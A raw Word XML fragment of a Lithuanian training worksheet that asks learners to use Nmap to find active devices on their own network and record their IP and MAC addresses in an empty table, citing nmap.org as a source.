            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0ABFDD" w14:textId="35B9E3C7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646C4AB6" w14:textId="1145C662" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="08FB83E3" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="763B2B75" w14:textId="1D712165" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439402CF" w14:textId="4424B2C3" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35DACA4B" w14:textId="56B3D731" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7147ED9D" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4132651A" w14:textId="3636A88C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A04870B" w14:textId="119F7395" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5532D772" w14:textId="420A00CD" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="5DBA4A48" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061611AC" w14:textId="162B0B9E" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47E3B673" w14:textId="24935554" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D5F62E" w14:textId="7CA6B48D" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48F993FE" w14:textId="77777777" w:rsidR="00BF4732" w:rsidRPr="005A5C28" w:rsidRDefault="00BF4732" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD6FC18" w14:textId="209E461F"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4 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATLIKITE NAUDOJAMO TINKLO SKENAVIMĄ IR</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMIESI PROGRAMA „NMAP“ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NUSTATYKITE AKTYVIUS TINKLO ĮRENGINIUS. </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Į LENTELĘ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SURAŠYKITE AKTYVIŲ ĮRENGINIŲ IP IR MAC ADRESUS</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="62904F14" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31A38F5C" w14:textId="2CD6A16D" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="769636BA" w14:textId="7D38861A" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F7A49AE" w14:textId="6DBB82CE" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MAC adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="52C8CEAE" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362F2128" w14:textId="0404F913" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F69FDA9" w14:textId="3BE18FCD" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE97A17" w14:textId="6708FAC4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="76DD8292" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297983C4" w14:textId="1AF6533D" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A0E4F7" w14:textId="0DC5BE5C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="798CC738" w14:textId="0C3A4FEE" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="43C30ED0" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CEA9E21" w14:textId="459DC1D2" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28AABC41" w14:textId="504F8D8F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187E5157" w14:textId="48622DC0" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="028BDD70" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579DB6DC" w14:textId="53D48948" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C93A501" w14:textId="389B0B81" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4630891B" w14:textId="1C2035F4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="3AC252F7" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438D5E53" w14:textId="06EB1156" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056C8B9A" w14:textId="68A6F5E7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D5459D3" w14:textId="2667B9D0" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32813BF6" w14:textId="77777777" w:rsidR="002D6D40" w:rsidRPr="005A5C28" w:rsidRDefault="002D6D40" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A528E72" w14:textId="0124334C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4A1AF" w14:textId="0D56A40F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="64967D10" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network Mapper.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="074779D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Free and open source (license) utility for network discovery and security auditing.</w:t>
      </w:r>
      <w:r w:rsidR="074779D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4BCA2F09" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r w:rsidR="4BCA2F09" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B3BE10D" w14:textId="77777777" w:rsidR="00BF4732" w:rsidRPr="005A5C28" w:rsidRDefault="00BF4732" w:rsidP="0089230F">
      <w:pPr>
